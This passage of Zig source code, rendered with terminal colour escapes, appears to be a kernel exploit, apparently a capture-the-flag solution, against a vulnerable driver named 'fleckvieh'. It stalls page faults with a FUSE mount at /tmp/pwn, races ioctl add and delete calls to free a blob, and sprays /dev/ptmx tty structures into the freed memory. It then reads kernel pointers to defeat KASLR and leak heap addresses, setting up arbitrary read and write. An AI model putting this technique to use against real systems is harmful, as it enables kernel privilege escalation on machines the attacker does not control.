�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m4�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"/aar"�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37mdebug�[0m�[1m�[37m(�[0m�[33m"Beginning AAR"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m4�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"/aaw"�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37mdebug�[0m�[1m�[37m(�[0m�[33m"Beginning AAW"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m100�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mblob_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"blob_add failed with {any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37merr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mENOENT�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"Unknown path {s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mpath�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mENOENT�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mDEL�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"blob_del failed with {any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37merr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mENOENT�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|*�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/ptmx"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDONLY�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNOCTTY�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mblob_buf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37msize�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mzeroes�[0m�[1m�[37m(�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_operations�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m.�[0m�[1m�[37mgetattr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mgetattrCallback�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m.�[0m�[1m�[37mopen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mopenCallback�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mreadCallback�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mfuseThread�[0m�[1m�[37m(�[0m�[1m�[37mfuse_ready�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmkdir�[0m�[1m�[37m(�[0m�[33m"/tmp/pwn"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"Could not create /tmp/pwn"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfargs�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_args�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mchan�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_mount�[0m�[1m�[37m(�[0m�[33m"/tmp/pwn"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mfargs�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"fuse_mount failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_unmount�[0m�[1m�[37m(�[0m�[33m"/tmp/pwn"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mchan�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_new�[0m�[1m�[37m(�[0m�[1m�[37mchan�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mfargs�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mfops�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@TypeOf�[0m�[1m�[37m(�[0m�[1m�[37mfops�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"fuse_new failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_set_signal_handlers�[0m�[1m�[37m(�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_get_session�[0m�[1m�[37m(�[0m�[1m�[37mf�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfuse_ready�[0m�[1m�[37m.�[0m�[37mset�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_loop_mt�[0m�[1m�[37m(�[0m�[1m�[37mf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mfusePage�[0m�[1m�[37m(�[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[37m[]�[0m�[33malign�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mS�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mfd�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mfd�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[1m�[37mpath�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmmap�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mREAD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mWRITE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mMAP�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mTYPE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPRIVATE�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mfd�[0m�[1m�[37m.�[0m�[1m�[36m?�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexploit�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mfusePage�[0m�[1m�[37m(�[0m�[33m"/tmp/pwn/aar"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmunmap�[0m�[1m�[37m(�[0m�[1m�[37maar_page�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mblob_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m0x20�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81c3c3c0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m[�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m)..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m))]).�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base @ 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[36m+�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mfusePage�[0m�[1m�[37m(�[0m�[33m"/tmp/pwn/aar"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmunmap�[0m�[1m�[37m(�[0m�[1m�[37maar_page�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mblob_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mGET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
